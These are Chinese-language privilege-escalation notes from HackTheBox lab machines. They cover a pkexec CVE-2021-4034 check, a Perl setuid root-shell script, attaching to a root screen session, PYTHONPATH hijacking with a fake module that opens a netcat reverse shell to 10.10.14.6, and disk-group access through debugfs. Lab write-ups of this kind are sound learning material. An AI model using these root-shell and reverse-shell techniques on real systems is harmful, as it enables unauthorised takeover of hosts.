1、CVE-2021-4034

查看suid中是否存在pkexec

find / -user root -perm -4000 -print 2>/dev/null

这篇文章介绍了怎么手动判断该漏洞是否存在

https://www.datadoghq.com/blog/pwnkit-vulnerability-overview-and-remediation/

dpkg -s policykit-1    #查看pkexec版本。

靶机Hackthebox Antique

2、perl

如果perl具有POSIX::setuid(0)能力，则可以直接使用perl执行脚本获取shell

在靶机上写a.pl，然后授权执行即可。

#!/usr/bin/perl
use POSIX qw(strftime);
use POSIX qw(setuid);
POSIX::setuid(0);
​
exec "/bin/sh"

靶机HackTheBox Nunchucks

3、screen

screen 4.5版本存在本地提权漏洞。但是这里不是该版本，所以不存在本地提权漏洞。

这里是获取root权限执行的screen屏幕。

查看进程

screen使用手册

https://linux.die.net/man/1/screen

确保通过将 xterm 导出到 TERM 变量来将终端仿真器设置为 xterm。

export TERM=xterm
screen -x root/root

靶机HackTheBox Backdoor

4、python环境变量劫持

这里主要是因为不合理的分配脚本权限。

sudo -l查看权限

无法修改这个文件

查看内容

admin_tasks.sh

#!/bin/bash
​
view_uptime()
{
/usr/bin/uptime -p
}
​
view_users()
{
/usr/bin/w
}
​
view_crontab()
{
/usr/bin/crontab -l
}
​
backup_passwd()
{
if [ "$EUID" -eq 0 ]
then
  echo "Backing up /etc/passwd to /var/backups/passwd.bak..."
  /bin/cp /etc/passwd /var/backups/passwd.bak
  /bin/chown root:root /var/backups/passwd.bak
  /bin/chmod 600 /var/backups/passwd.bak
  echo "Done."
else
  echo "Insufficient privileges to perform the selected operation."
fi
}
​
backup_shadow()
{
if [ "$EUID" -eq 0 ]
then
  echo "Backing up /etc/shadow to /var/backups/shadow.bak..."
  /bin/cp /etc/shadow /var/backups/shadow.bak
  /bin/chown root:shadow /var/backups/shadow.bak
  /bin/chmod 600 /var/backups/shadow.bak
  echo "Done."
else
  echo "Insufficient privileges to perform the selected operation."
fi
}
​
backup_web()
{
if [ "$EUID" -eq 0 ]
then
  echo "Running backup script in the background, it might take a while..."
  /opt/scripts/backup.py &
else
  echo "Insufficient privileges to perform the selected operation."
fi
}
​
backup_db()
{
if [ "$EUID" -eq 0 ]
then
  echo "Running mysqldump in the background, it may take a while..."
  #/usr/bin/mysqldump -u root admirerdb > /srv/ftp/dump.sql &
  /usr/bin/mysqldump -u root admirerdb > /var/backups/dump.sql &
else
  echo "Insufficient privileges to perform the selected operation."
fi
}
​
​
​
# Non-interactive way, to be used by the web interface
if [ $# -eq 1 ]
then
option=$1
case $option in
  1) view_uptime ;;
  2) view_users ;;
  3) view_crontab ;;
  4) backup_passwd ;;
  5) backup_shadow ;;
  6) backup_web ;;
  7) backup_db ;;
​
  *) echo "Unknown option." >&2
esac
​
exit 0
fi
​
​
# Interactive way, to be called from the command line
options=("View system uptime"
   "View logged in users"
   "View crontab"
   "Backup passwd file"
   "Backup shadow file"
   "Backup web data"
   "Backup DB"
   "Quit")
​
echo
echo "[[[ System Administration Menu ]]]"
PS3="Choose an option: "
COLUMNS=11
select opt in "${options[@]}"; do
case $REPLY in
  1) view_uptime ; break ;;
  2) view_users ; break ;;
  3) view_crontab ; break ;;
  4) backup_passwd ; break ;;
  5) backup_shadow ; break ;;
  6) backup_web ; break ;;
  7) backup_db ; break ;;
  8) echo "Bye!" ; break ;;
​
  *) echo "Unknown option." >&2
esac
done
​
exit 0

backup.py，似乎发现新大陆。从shutil导入make_archive

#!/usr/bin/python3
​
from shutil import make_archive
​
src = '/var/www/html/'
​
# old ftp directory, not used anymore
#dst = '/srv/ftp/html'
​
dst = '/var/backups/html'
​
make_archive(dst, 'gztar', src)

python环境变量劫持

可以使用' make_archive '函数创建一个假的python 模块，并让这个backup.py通过 PYTHONPATH 变量导入我们的库！

import os
def make_archive(a,b,c):
  os.system("nc 10.10.14.6 1234 -e '/bin/sh'")

sudo PYTHONPATH=/tmp/ /opt/scripts/admin_tasks.sh

靶场 HackTheBox Admirer

5、disk组用户获取root秘钥

用户是磁盘组的一部分，这使用户可以完全访问/dev/中包含的任何块设备。对此的访问几乎等同于 root 访问。

我们可以使用debugfs以有效的 root 级别权限枚举整个磁盘。

ls -la /dev/sda1 
debugfs /dev/sda1
​

靶场 HackTheBox Falafel